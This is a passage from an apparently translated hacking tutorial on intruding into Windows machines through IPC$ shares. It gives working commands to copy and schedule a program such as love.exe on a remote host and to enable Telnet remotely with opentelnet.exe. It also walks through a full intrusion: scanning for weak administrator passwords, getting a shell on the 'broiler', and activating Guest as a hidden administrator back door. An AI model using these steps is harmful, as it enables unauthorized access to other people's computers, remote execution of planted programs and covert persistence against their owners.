    For example, "copy ccbirds.exe \\*.*.*.*\c$" copies the file from the current directory to the other side's C drive.
13) Add a scheduled task remotely:
    at \\IP time program
    For example: at \\127.0.0.0 11:00 love.exe
    Note: the time uses the 24-hour clock; a program in the system's default search path (such as system32\) needs no path, otherwise the full path must be given.
14) Open Telnet on the remote host. A small program is needed: opentelnet.exe, available on all major download sites. Four requirements must also be met: a) the target has IPC$ sharing open; b) you have an administrator account and password; c) the target has the RemoteRegistry service open; d) it works on Win2K/XP; NT untested.
    Command format: opentelnet.exe \\server account psw NTLMAuthor port
    Example: C:\>opentelnet.exe \\*.*.*.* administrator "" 1 90
15) Activate a user / add it to the administrators group:
    net user account /active:yes
    net localgroup administrators account /add
16) Close Telnet on the remote host. Also needs a small program: resumetelnet.exe.
    Command format: resumetelnet.exe \\server account psw
    Example: C:\>resumetelnet.exe \\*.*.*.* ""
17) Delete an established IPC$ connection:
    net use \\IP\ipc$ /del

(This tutorial is updated from time to time; for the latest version please visit the official site, Rookie Community: http://ccbirds.yeah.net)

XII. Complete IPC$ intrusion steps

Actual intrusion steps vary with personal preference; I will just describe the common ones, heh, and make a fool of myself!

1) Use scanning software such as Streamer (Fluxay), SSS or X-Scan to look for hosts, whichever you like, then lock onto a target. If you scan out a password with administrator privileges, you can carry out the following steps. Suppose the Administrator password you got is empty.
2) Now you have two routes: open telnet (command line), or give it a Trojan (graphical interface). Let's take the first route, and first look at the commands for opening telnet.
3) Use the little program opentelnet:

    C:\>opentelnet.exe \\192.168.21.* ...
    ***********************************************************
    Remote Telnet Configure, by refDom@263.net
    opentelnet.exe usage: opentelnet.exe \\server username password NTLMAuthor telnetport
    ***********************************************************
    Connecting \\192.168.21.*... Successfully!
    Notice!!!!!! The Telnet Service default setting: NTLMAuthor=2 TelnetPort=23
    Starting telnet service... telnet service is started successfully
    telnet service is running
    BINGLE!!! Yeah!! Telnet Port is 90. You can try: "telnet ip 90", to connect the Server!
    Disconnecting Server... Successfully!

   This means you have opened a Telnet on port 90.
4) Now telnet in: telnet 192.168.21.* 90. If successful, you get a shell on the remote host and can control the compromised machine ("broiler") like your own. What to do now? Activate Guest and add it to the administrators group, so that a back door remains even after you leave.
5) C:\>net user guest /active:yes
   Activates the Guest user. Perhaps their Guest is already active; you can check with "net user guest" whether the "Account active" value is Yes or No.
6) C:\>net user guest 1234
   Changes Guest's password to 1234, or to whatever password you like.
7) C:\>net localgroup administrators guest /add
   Makes Guest an administrator, so that even after the administrator changes his password we can still log in with Guest. But a reminder: through security policy settings, remote access by accounts such as Guest can be prohibited; if that is the case, this back door of ours is wasted too, and may God bless Guest.